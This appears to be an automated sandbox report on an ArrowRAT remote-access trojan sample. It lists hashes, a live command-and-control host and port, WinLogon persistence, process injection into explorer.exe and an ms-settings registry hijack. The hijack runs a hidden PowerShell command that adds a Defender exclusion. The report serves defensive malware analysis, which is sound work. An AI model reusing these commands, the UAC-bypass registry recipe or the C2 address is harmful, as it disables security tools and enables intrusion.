Analysis
-
max time kernel
129s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
31-07-2023 02:40
Behavioral task
behavioral1
Sample
d7dea9816b882cb53d615a3afdf0c955.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
d7dea9816b882cb53d615a3afdf0c955.exe
Resource
win10v2004-20230703-en
General
-
Target
d7dea9816b882cb53d615a3afdf0c955.exe
-
Size
158KB
-
MD5
d7dea9816b882cb53d615a3afdf0c955
-
SHA1
d3bfd91ff74c072028bd747d4f56f17cc55168a5
-
SHA256
96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
-
SHA512
b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35
-
SSDEEP
3072:5bzgH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfP/NO8Y:5bzge0ODhTEPgnjuIJzo+PPcfP/A8
Malware Config
Extracted
arrowrat
Client
line-ellis.gl.at.ply.gg:10735
nAChhjAnR
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe" d7dea9816b882cb53d615a3afdf0c955.exe -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute d7dea9816b882cb53d615a3afdf0c955.exe Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings d7dea9816b882cb53d615a3afdf0c955.exe Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell d7dea9816b882cb53d615a3afdf0c955.exe Set value (str) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe'" d7dea9816b882cb53d615a3afdf0c955.exe Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell\open\command d7dea9816b882cb53d615a3afdf0c955.exe Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell\open d7dea9816b882cb53d615a3afdf0c955.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe 1212 d7dea9816b882cb53d615a3afdf0c955.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 1212 d7dea9816b882cb53d615a3afdf0c955.exe Token: SeShutdownPrivilege 2612 explorer.exe Token: SeShutdownPrivilege 2612 explorer.exe Token: SeShutdownPrivilege 2612 explorer.exe Token: SeShutdownPrivilege 2612 explorer.exe Token: SeShutdownPrivilege 2612 explorer.exe Token: SeShutdownPrivilege 2612 explorer.exe Token: SeShutdownPrivilege 2612 explorer.exe Token: SeShutdownPrivilege 2612 explorer.exe Token: SeShutdownPrivilege 2612 explorer.exe Token: SeShutdownPrivilege 2612 explorer.exe Token: SeShutdownPrivilege 2612 explorer.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe -
Suspicious use of SendNotifyMessage 18 IoCs
pid Process 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe 2612 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1212 d7dea9816b882cb53d615a3afdf0c955.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 1212 wrote to memory of 2612 1212 d7dea9816b882cb53d615a3afdf0c955.exe 28 PID 1212 wrote to memory of 2612 1212 d7dea9816b882cb53d615a3afdf0c955.exe 28 PID 1212 wrote to memory of 2612 1212 d7dea9816b882cb53d615a3afdf0c955.exe 28 PID 2612 wrote to memory of 1492 2612 explorer.exe 30 PID 2612 wrote to memory of 1492 2612 explorer.exe 30 PID 2612 wrote to memory of 1492 2612 explorer.exe 30 PID 1212 wrote to memory of 2644 1212 d7dea9816b882cb53d615a3afdf0c955.exe 29 PID 1212 wrote to memory of 2644 1212 d7dea9816b882cb53d615a3afdf0c955.exe 29 PID 1212 wrote to memory of 2644 1212 d7dea9816b882cb53d615a3afdf0c955.exe 29 PID 1212 wrote to memory of 2644 1212 d7dea9816b882cb53d615a3afdf0c955.exe 29 PID 1212 wrote to memory of 2568 1212 d7dea9816b882cb53d615a3afdf0c955.exe 34 PID 1212 wrote to memory of 2568 1212 d7dea9816b882cb53d615a3afdf0c955.exe 34 PID 1212 wrote to memory of 2568 1212 d7dea9816b882cb53d615a3afdf0c955.exe 34 PID 1212 wrote to memory of 2568 1212 d7dea9816b882cb53d615a3afdf0c955.exe 34 PID 1212 wrote to memory of 2452 1212 d7dea9816b882cb53d615a3afdf0c955.exe 33 PID 1212 wrote to memory of 2452 1212 d7dea9816b882cb53d615a3afdf0c955.exe 33 PID 1212 wrote to memory of 2452 1212 d7dea9816b882cb53d615a3afdf0c955.exe 33 PID 1212 wrote to memory of 2452 1212 d7dea9816b882cb53d615a3afdf0c955.exe 33 PID 1212 wrote to memory of 2060 1212 d7dea9816b882cb53d615a3afdf0c955.exe 32 PID 1212 wrote to memory of 2060 1212 d7dea9816b882cb53d615a3afdf0c955.exe 32 PID 1212 wrote to memory of 2060 1212 d7dea9816b882cb53d615a3afdf0c955.exe 32 PID 1212 wrote to memory of 2060 1212 d7dea9816b882cb53d615a3afdf0c955.exe 32 PID 1212 wrote to memory of 2136 1212 d7dea9816b882cb53d615a3afdf0c955.exe 31 PID 1212 wrote to memory of 2136 1212 d7dea9816b882cb53d615a3afdf0c955.exe 31 PID 1212 wrote to memory of 2136 1212 d7dea9816b882cb53d615a3afdf0c955.exe 31 PID 1212 wrote to memory of 2136 1212 d7dea9816b882cb53d615a3afdf0c955.exe 31 PID 1212 wrote to memory of 2260 1212 d7dea9816b882cb53d615a3afdf0c955.exe 35 PID 1212 wrote to memory of 2260 1212 d7dea9816b882cb53d615a3afdf0c955.exe 35 PID 1212 wrote to memory of 2260 1212 d7dea9816b882cb53d615a3afdf0c955.exe 35 PID 1212 wrote to memory of 2260 1212 d7dea9816b882cb53d615a3afdf0c955.exe 35 PID 1212 wrote to memory of 2676 1212 d7dea9816b882cb53d615a3afdf0c955.exe 36 PID 1212 wrote to memory of 2676 1212 d7dea9816b882cb53d615a3afdf0c955.exe 36 PID 1212 wrote to memory of 2676 1212 d7dea9816b882cb53d615a3afdf0c955.exe 36 PID 1212 wrote to memory of 2676 1212 d7dea9816b882cb53d615a3afdf0c955.exe 36 PID 1212 wrote to memory of 2824 1212 d7dea9816b882cb53d615a3afdf0c955.exe 39 PID 1212 wrote to memory of 2824 1212 d7dea9816b882cb53d615a3afdf0c955.exe 39 PID 1212 wrote to memory of 2824 1212 d7dea9816b882cb53d615a3afdf0c955.exe 39 PID 1212 wrote to memory of 2824 1212 d7dea9816b882cb53d615a3afdf0c955.exe 39 PID 1212 wrote to memory of 2532 1212 d7dea9816b882cb53d615a3afdf0c955.exe 38 PID 1212 wrote to memory of 2532 1212 d7dea9816b882cb53d615a3afdf0c955.exe 38 PID 1212 wrote to memory of 2532 1212 d7dea9816b882cb53d615a3afdf0c955.exe 38 PID 1212 wrote to memory of 2532 1212 d7dea9816b882cb53d615a3afdf0c955.exe 38 PID 1212 wrote to memory of 2928 1212 d7dea9816b882cb53d615a3afdf0c955.exe 37 PID 1212 wrote to memory of 2928 1212 d7dea9816b882cb53d615a3afdf0c955.exe 37 PID 1212 wrote to memory of 2928 1212 d7dea9816b882cb53d615a3afdf0c955.exe 37 PID 1212 wrote to memory of 2928 1212 d7dea9816b882cb53d615a3afdf0c955.exe 37 PID 1212 wrote to memory of 3024 1212 d7dea9816b882cb53d615a3afdf0c955.exe 40 PID 1212 wrote to memory of 3024 1212 d7dea9816b882cb53d615a3afdf0c955.exe 40 PID 1212 wrote to memory of 3024 1212 d7dea9816b882cb53d615a3afdf0c955.exe 40 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe"C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe"1⤵
- Modifies WinLogon for persistence
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:1492
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2644
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2136
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2060
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2452
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2568
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2260
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2676
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2928
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2532
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2824
-
-
C:\Windows\System32\ComputerDefaults.exe"C:\Windows\System32\ComputerDefaults.exe"2⤵PID:3024
-